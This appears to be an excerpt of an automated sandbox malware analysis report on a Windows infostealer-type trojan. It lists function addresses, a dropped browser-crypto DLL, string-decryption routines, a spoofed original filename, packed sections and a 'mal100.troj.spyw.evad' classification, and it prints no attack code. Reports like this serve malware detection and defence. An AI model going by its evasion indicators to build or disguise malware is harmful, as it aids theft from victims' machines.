Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0090572C	0_2_0090572C
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094A92B	0_2_0094A92B
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008FCAF2	0_2_008FCAF2
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0090BB36	0_2_0090BB36
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00903C92	0_2_00903C92
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094AD13	0_2_0094AD13
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00949D26	0_2_00949D26
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F1D79	0_2_008F1D79
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008FFEF0	0_2_008FFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041C585	3_2_0041C585
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041B825	3_2_0041B825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042DA53	3_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042D2E3	3_2_0042D2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042CE4E	3_2_0042CE4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041961D	3_2_0041961D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042DE3B	3_2_0042DE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042D681	3_2_0042D681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBA35A0	3_2_6CBA35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB6C80	3_2_6CBB6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE6CF0	3_2_6CBE6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBAD4E0	3_2_6CBAD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC034A0	3_2_6CC034A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC0C4A0	3_2_6CC0C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCD4D0	3_2_6CBCD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB64C0	3_2_6CBB64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC1545C	3_2_6CC1545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE5C10	3_2_6CBE5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBF2C10	3_2_6CBF2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC1AC00	3_2_6CC1AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC1542B	3_2_6CC1542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB5440	3_2_6CBB5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC085F0	3_2_6CC085F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE0DD0	3_2_6CBE0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCED10	3_2_6CBCED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBD0512	3_2_6CBD0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBBFD00	3_2_6CBBFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC176E3	3_2_6CC176E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBC5E90	3_2_6CBC5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC0E680	3_2_6CC0E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBABEF0	3_2_6CBABEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBBFEF0	3_2_6CBBFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC04EA0	3_2_6CC04EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC16E63	3_2_6CC16E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE7E10	3_2_6CBE7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBF5600	3_2_6CBF5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBAC670	3_2_6CBAC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBC9E50	3_2_6CBC9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE3E50	3_2_6CBE3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC09E30	3_2_6CC09E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBF2E4E	3_2_6CBF2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBC4640	3_2_6CBC4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBF77A0	3_2_6CBF77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBD6FF0	3_2_6CBD6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBADFE0	3_2_6CBADFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE7710	3_2_6CBE7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB9F00	3_2_6CBB9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC150C7	3_2_6CC150C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBD60A0	3_2_6CBD60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCC0E0	3_2_6CBCC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE58E0	3_2_6CBE58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBEB820	3_2_6CBEB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBF4820	3_2_6CBF4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB7810	3_2_6CBB7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBEF070	3_2_6CBEF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBC8850	3_2_6CBC8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCD850	3_2_6CBCD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBDD9B0	3_2_6CBDD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBAC9A0	3_2_6CBAC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE5190	3_2_6CBE5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC02990	3_2_6CC02990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC1B170	3_2_6CC1B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBFB970	3_2_6CBFB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBBD960	3_2_6CBBD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCA940	3_2_6CBCA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBBCAB0	3_2_6CBBCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBA22A0	3_2_6CBA22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBD4AA0	3_2_6CBD4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBC1AF0	3_2_6CBC1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBEE2F0	3_2_6CBEE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC1BA90	3_2_6CC1BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC12AB0	3_2_6CC12AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE8AC0	3_2_6CBE8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE9A60	3_2_6CBE9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC153C8	3_2_6CC153C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBAF380	3_2_6CBAF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBED320	3_2_6CBED320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBBC370	3_2_6CBBC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBA5340	3_2_6CBA5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC4ECC0	3_2_6CC4ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCAECD0	3_2_6CCAECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC5AC60	3_2_6CC5AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD16C00	3_2_6CD16C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD2AC30	3_2_6CD2AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CDDCDC0	3_2_6CDDCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCE6D90	3_2_6CCE6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC54DB0	3_2_6CC54DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD7AD50	3_2_6CD7AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD1ED70	3_2_6CD1ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CDD8D20	3_2_6CDD8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC5AEC0	3_2_6CC5AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCF0EC0	3_2_6CCF0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCD6E90	3_2_6CCD6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCEEE70	3_2_6CCEEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD30E20	3_2_6CD30E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD2EFF0	3_2_6CD2EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC50FE0	3_2_6CC50FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD98FB0	3_2_6CD98FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC5EFB0	3_2_6CC5EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCBEF40	3_2_6CCBEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD12F70	3_2_6CD12F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC56F10	3_2_6CC56F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD90F20	3_2_6CD90F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD568E0	3_2_6CD568E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD24840	3_2_6CD24840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCA0820	3_2_6CCA0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCDA820	3_2_6CCDA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD6C9E0	3_2_6CD6C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC849F0	3_2_6CC849F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD109B0	3_2_6CD109B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCE09A0	3_2_6CCE09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD0A9A0	3_2_6CD0A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC88960	3_2_6CC88960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCA6900	3_2_6CCA6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCCEA80	3_2_6CCCEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCCCA70	3_2_6CCCCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCFEA00	3_2_6CCFEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD08A30	3_2_6CD08A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD56BE0	3_2_6CD56BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCF0BA0	3_2_6CCF0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC964D0	3_2_6CC964D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCEA4D0	3_2_6CCEA4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD7A480	3_2_6CD7A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC68460	3_2_6CC68460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCB4420	3_2_6CCB4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCDA430	3_2_6CCDA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD1A5E0	3_2_6CD1A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCDE5F0	3_2_6CCDE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC445B0	3_2_6CC445B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD98550	3_2_6CD98550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCA8540	3_2_6CCA8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD54540	3_2_6CD54540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCB2560	3_2_6CCB2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCF0570	3_2_6CCF0570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC746D0	3_2_6CC746D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCAE6E0	3_2_6CCAE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCEE6E0	3_2_6CCEE6E0
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D02021	10_2_00D02021
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D340C8	10_2_00D340C8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D32088	10_2_00D32088
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2E1CF	10_2_00D2E1CF
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D5E1A8	10_2_00D5E1A8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D5E132	10_2_00D5E132
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D32123	10_2_00D32123
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2E272	10_2_00D2E272
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2E27B	10_2_00D2E27B
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D38278	10_2_00D38278
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D30488	10_2_00D30488
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2E455	10_2_00D2E455
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2E527	10_2_00D2E527
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D68798	10_2_00D68798
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D5E738	10_2_00D5E738
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D74988	10_2_00D74988
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D34AC8	10_2_00D34AC8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D0CAF2	10_2_00D0CAF2
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D4AA47	10_2_00D4AA47
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D5AD84	10_2_00D5AD84
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D38D88	10_2_00D38D88
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D36D40	10_2_00D36D40
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D74E98	10_2_00D74E98
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D76FA8	10_2_00D76FA8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D70F18	10_2_00D70F18
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D3EF08	10_2_00D3EF08
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D3B078	10_2_00D3B078
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D371D8	10_2_00D371D8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D651A8	10_2_00D651A8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D0729C	10_2_00D0729C
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D633C8	10_2_00D633C8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D1D39B	10_2_00D1D39B
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D494C8	10_2_00D494C8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D6B778	10_2_00D6B778
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D1572C	10_2_00D1572C
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D71918	10_2_00D71918
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D59BA8	10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D1BB36	10_2_00D1BB36
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D13C92	10_2_00D13C92
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D37DE8	10_2_00D37DE8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D01D79	10_2_00D01D79
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2DED8	10_2_00D2DED8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D0FEF0	10_2_00D0FEF0

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: String function: 00D4A1D8 appears 152 times
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: String function: 00D07B80 appears 49 times
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: String function: 00D39978 appears 93 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CDD09D0 appears 146 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CC79B10 appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CC73620 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004104E7 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CBDCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CBE94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CDDDAE0 appears 35 times
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: String function: 008F7B80 appears 49 times

One or more processes crash

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 288

Sample file is different than original file name gathered from version info

Source: f1r6P3j3g7.exe, 00000000.00000000.1664311173.0000000000980000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs f1r6P3j3g7.exe
Source: f1r6P3j3g7.exe	Binary or memory string: OriginalFilenameproquota.exej% vs f1r6P3j3g7.exe

Uses 32bit PE files

Source: f1r6P3j3g7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: f1r6P3j3g7.exe	Static PE information: Section: .data ZLIB complexity 0.9919195713141026
Source: KEGIDHJKKJ.exe.3.dr	Static PE information: Section: .data ZLIB complexity 0.9912368881118881
Source: a43486128347[1].exe.3.dr	Static PE information: Section: .data ZLIB complexity 0.9912368881118881

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/40@13/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_6CC07030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6CC07030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

3_2_00411807

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\GKI36XO7.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6532
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess908
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2664

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: C:\ProgramData\KEGIDHJKKJ.exe	Command line argument: MZx	10_2_00D02021
Source: C:\ProgramData\KEGIDHJKKJ.exe	Command line argument: MZx	10_2_00D02021
Source: C:\ProgramData\KEGIDHJKKJ.exe	Command line argument: MZx	10_2_00D02021

Source: f1r6P3j3g7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
